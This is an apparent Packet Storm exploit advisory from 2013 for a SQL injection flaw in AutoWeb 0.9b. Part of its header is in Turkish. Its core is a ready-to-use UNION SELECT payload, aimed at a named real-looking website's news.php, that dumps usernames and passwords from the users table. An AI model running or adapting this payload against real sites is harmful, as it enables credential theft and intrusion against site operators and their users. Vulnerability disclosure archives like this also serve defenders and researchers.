AutoWeb 0.9b SQL Injection

2013-07-21T00:00:00
ID PACKETSTORM:122491
Type packetstorm
Reporter Lazmania61
Modified 2013-07-21T00:00:00

Description

                                        
                                            `  
< ------------------- header data start ------------------- >  
  
#############################################################  
  
# Application Name : AutoWeb 0.9b  
  
# Vulnerable Type : SqL Injection  
  
# Infection : Kullanýcý ve Yönetici Bilgileri Çekilebilir.  
  
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir.  
  
# Author : Lazmania61  
  
# Example : http://www.savinodelbene.hr/news.php?id=2&lang=IT&theme=savino&news=1  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
http://www.savinodelbene.hr/news.php?id=2&lang=IT&theme=savino&news=-1%20UnIOn%20SeLEct%201,group_concat%28username,0x94,password%29,3,4,5%20FrOm%20users  
  
< -- bug code end of -- >  
  
`